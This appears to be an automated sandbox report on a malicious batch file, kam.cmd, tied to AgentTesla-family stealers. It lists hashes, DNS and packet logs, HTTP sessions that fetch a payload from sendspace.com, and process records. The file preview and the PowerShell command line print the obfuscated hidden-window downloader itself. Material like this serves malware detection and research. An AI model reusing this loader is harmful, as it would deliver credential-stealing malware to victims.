  QUOTATION_MAYQTRA031244#U00faPDF.scr.exe: malicious (AgentTesla, PureLog Stealer)
  Wgdebahewafthr.exe: malicious (AgentTesla, DBatLoader, PureLog Stealer, zgRAT)
  hesaphareketi-.exe: malicious (AgentTesla)
  Reading note: the same fingerprint covers GuLoader, AgentTesla and DBatLoader samples here, so on its own it identifies the TLS client stack these stagers run on rather than this family; it is a pivot for hunting, not an attribution key.

Dropped files: No context
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                              MD5:DA1F22117B9766A1F0220503765A5BA5
                                              SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                              SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                              SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:@...e.................................R..............@..........
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6222
                                              Entropy (8bit):3.712862125951217
                                              Encrypted:false
                                              SSDEEP:96:HUzCXoVkvhkvCCtLfvuSvHcM4fvuSqHcMl:HUYmLfvSfvE
                                              MD5:CDF63A1B0CFEC851C38278B79AFB7641
                                              SHA1:B8BD42F983A50C586F21DB494DA19759E7FE0C05
                                              SHA-256:16809D80E05CCD32A4AD5B820E5A6F393CDDB9ACD519AB05E3CA909FD8C9E8A1
                                              SHA-512:B0332CC3920FD0031FAD3CB3CA0EA71388D088286B4CC5083D0C87F6D7DEA695DE96B44A81F130BCBB8C93552BFF45836F5C92AD1B91D823F0C49FC3B9BC3C36
                                              Malicious:false
                                              Reputation:low
                                              Preview:...................................FL..................F.".. ...d......DQm.C...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....99..C....(..C.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Xk.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Xi...Roaming.@......DWSl.Xi.....C.......................l.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Xg.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Xg.....E......................F-.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Xg.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Xg.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Xm.....q...........
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):409100
                                              Entropy (8bit):5.926622986286069
                                              Encrypted:false
                                              SSDEEP:6144:cpxMcfqJyydmQ3CPY+PC82Xx8/gtXL7mZEaFuxHBSWgHn6Doc2dIFqGyVrtAvdI7:cplAr3CgYCBXKYFP2pgLY6gWMwDs
                                              MD5:96FAB9E17EC0F9527A26D76802465E61
                                              SHA1:A3D34FB91B0F8003C4814694BA1B661B6802B17E
                                              SHA-256:87C04C3F17540640E7AE0BC45C700CCCA0D3803487A1B1202F3F8D389067A76C
                                              SHA-512:C42101E2DEF0DF367B8C55081A60572C6D2B1DD94E6E9DE153D2F56A769BE75F207B0D0A9A0BFCE0C344757B29418F093CAA62DA74918897F2C815720847CFBF
                                              Malicious:false
                                              Preview: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
                                              File type:ASCII text, with very long lines (6205), with no line terminators
                                              Entropy (8bit):5.262293353188707
                                              TrID:
                                                File name:kam.cmd
                                                File size:6'205 bytes
                                                MD5:37b176c0abc29ec74dede88ced6e4cf1
                                                SHA1:4aed169208162c12f26dfbe68e94e6781afcc47e
                                                SHA256:7a5335537efdf7a6becc59c61912dd6b2b56ac7a2e9315b32a0dc3f8ac500fc5
                                                SHA512:e8c36cf60ec4ac67dc60e30e8c60b58e12bd4ab522b8990faf038931bc5c93f41b144cc947847e23f09c163cf273f973d5162bf3f37b1c00f2ff7e19c54c5603
                                                SSDEEP:192:qFS6GncJ3ovYJpHx+WHCNQWq/HncI1yiRj:qFS6Gq3AYJ/+AWqPncyX
                                                TLSH:99D13B1A561412BD9ECF16A46E5B4B3B2E30649B21151101EF7FEBC94CCCE6433AEC4B
                                                File Content Preview:start /min powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningske
                                                Icon Hash:9686878b929a9886
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
May 23, 2024 21:03:28.987565041 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:03:28.987607956 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:03:28.987684965 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:03:29.026655912 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:03:29.026679039 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:03:29.553886890 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:03:29.554024935 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:03:29.558120012 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:03:29.558146000 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:03:29.558518887 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:03:29.570417881 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:03:29.614510059 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:03:29.843539953 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:03:29.843713045 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:03:29.843780041 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:03:29.846805096 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:03:29.868391991 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:29.868433952 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:29.868505955 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:29.868930101 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:29.868942022 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:30.693945885 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:30.694111109 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:30.697659016 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:30.697676897 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:30.697954893 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:30.699136972 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:30.746503115 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.051395893 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.051422119 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.051436901 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.051666975 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.051683903 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.051734924 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.082320929 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.082351923 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.082520962 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.082535982 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.082681894 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.130800962 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.130827904 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.130906105 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.130920887 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.130961895 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.151904106 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.151927948 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.151982069 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.151993990 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.152033091 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.152053118 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.166723967 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.166750908 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.166824102 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.166832924 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.166867971 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.185106039 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.185136080 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.185208082 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.185220003 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.185259104 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.230724096 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.230756998 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.230952024 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.230964899 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.231039047 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.241946936 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.241974115 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.242055893 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.242069006 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.242129087 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.258702993 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.258730888 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.258856058 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.258867979 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.258920908 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.552970886 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.552998066 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.553137064 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.553152084 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.553263903 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.559691906 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.559715986 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.559782028 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.559794903 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.559809923 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.559828043 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.567876101 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.567900896 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.568007946 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.568021059 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.568094969 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.573585033 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.573640108 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.573788881 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.573807955 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.573862076 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.581394911 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.581459045 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.581501007 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.581511974 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.581573963 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.581592083 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.587049961 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.587070942 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.587130070 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.587141037 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.587177992 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.591645956 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.591672897 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.591728926 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.591741085 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.591813087 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.597851038 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.597873926 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.597959042 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.597969055 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.598007917 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.602240086 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.602263927 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.602432013 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.602442980 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.602523088 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.608258009 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.608278036 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.608334064 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.608346939 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.608383894 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.612067938 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.612092972 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.612219095 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.612241030 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.612283945 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.615818024 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.615844011 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.615914106 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.615931988 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.615994930 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.619498968 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.619549990 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.619575024 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.619585991 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.619606972 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.619678020 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.623039007 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.623070955 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.623152018 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.623178959 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.623195887 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.623217106 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.626292944 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.626321077 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.626373053 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.626390934 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.626420021 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.626436949 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.628815889 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.628853083 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.628989935 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.628989935 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.629014015 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.629100084 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.629645109 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.629707098 CEST  443          49705      69.31.136.53    192.168.2.5
May 23, 2024 21:03:31.629751921 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.636651039 CEST  49705        443        192.168.2.5     69.31.136.53
May 23, 2024 21:03:31.636687994 CEST  443          49705      69.31.136.53    192.168.2.5
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
May 23, 2024 21:03:28.970252991 CEST  56043        53         192.168.2.5  1.1.1.1
May 23, 2024 21:03:28.981745005 CEST  53           56043      1.1.1.1      192.168.2.5
May 23, 2024 21:03:29.848505974 CEST  57408        53         192.168.2.5  1.1.1.1
May 23, 2024 21:03:29.867526054 CEST  53           57408      1.1.1.1      192.168.2.5
May 23, 2024 21:03:48.401582003 CEST  53           51841      1.1.1.1      192.168.2.5
May 23, 2024 21:03:49.883737087 CEST  53           61450      1.1.1.1      192.168.2.5
May 23, 2024 21:03:51.637762070 CEST  63843        53         192.168.2.5  1.1.1.1
May 23, 2024 21:03:51.711632967 CEST  53           63843      1.1.1.1      192.168.2.5
Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                      Type                  Class        DNS over HTTPS
May 23, 2024 21:03:28.970252991 CEST  192.168.2.5  1.1.1.1  0xdabe    Standard query (0)  www.sendspace.com         A (IP address)        IN (0x0001)  false
May 23, 2024 21:03:29.848505974 CEST  192.168.2.5  1.1.1.1  0x83f6    Standard query (0)  fs12n5.sendspace.com      A (IP address)        IN (0x0001)  false
May 23, 2024 21:03:51.637762070 CEST  192.168.2.5  1.1.1.1  0x196d    Standard query (0)  50.23.12.20.in-addr.arpa  PTR (Pointer record)  IN (0x0001)  false
Timestamp                           Source IP  Dest IP      Trans ID  Reply Code      Name                      CName  Address         Type                  Class        DNS over HTTPS
May 23, 2024 21:03:28.981745005 CEST  1.1.1.1    192.168.2.5  0xdabe    No error (0)    www.sendspace.com         -      172.67.170.105  A (IP address)        IN (0x0001)  false
May 23, 2024 21:03:28.981745005 CEST  1.1.1.1    192.168.2.5  0xdabe    No error (0)    www.sendspace.com         -      104.21.28.80    A (IP address)        IN (0x0001)  false
May 23, 2024 21:03:29.867526054 CEST  1.1.1.1    192.168.2.5  0x83f6    No error (0)    fs12n5.sendspace.com      -      69.31.136.53    A (IP address)        IN (0x0001)  false
May 23, 2024 21:03:51.711632967 CEST  1.1.1.1    192.168.2.5  0x196d    Name error (3)  50.23.12.20.in-addr.arpa  none   none            PTR (Pointer record)  IN (0x0001)  false
                                                • www.sendspace.com
                                                • fs12n5.sendspace.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        172.67.170.105  443               5256  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-23 19:03:29 UTC174OUTGET /pro/dl/ogm6qc HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: www.sendspace.com
                                                Connection: Keep-Alive
                                                2024-05-23 19:03:29 UTC943INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 23 May 2024 19:03:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: SID=m93ic7teca95s3jppr9t1250a6; path=/; domain=.sendspace.com
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Pragma: no-cache
                                                Location: https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso
                                                Vary: Accept-Encoding
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2FxAwkApkyx6xVRd%2FD1VQ4JJar9EdMbA4Bc2ppcQhxXpSSvIp1awBUjjEnrzDLBxTA%2BR1%2B6oNzlyrd3A3YmEuxJ6xAAov1MJyZ2GQzPJxmdMgX6v3gZ7Dvs0lSlFUig4FDG1nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 88874e6a6bbb7c9a-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-23 19:03:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.5 | 49705 | 69.31.136.53 | 443 | 5256 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-23 19:03:30 UTC | 234 | OUT | GET /dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: fs12n5.sendspace.com
                                                Connection: Keep-Alive
                                                2024-05-23 19:03:31 UTC | 500 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 23 May 2024 19:03:30 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 441332
                                                Last-Modified: Mon, 20 May 2024 13:39:51 GMT
                                                Connection: close
                                                Set-Cookie: SID=befm2387rj5i75i2i1fsfb4517; path=/; domain=.sendspace.com
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Content-Disposition: attachment;filename="Potentialet.mso"
                                                ETag: "664b52a7-6bbf4"
                                                Accept-Ranges: bytes



                                                Target ID:0
                                                Start time:15:03:24
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
                                                Imagebase:0x7ff6e68e0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:1
                                                Start time:15:03:24
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:15:03:24
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. 
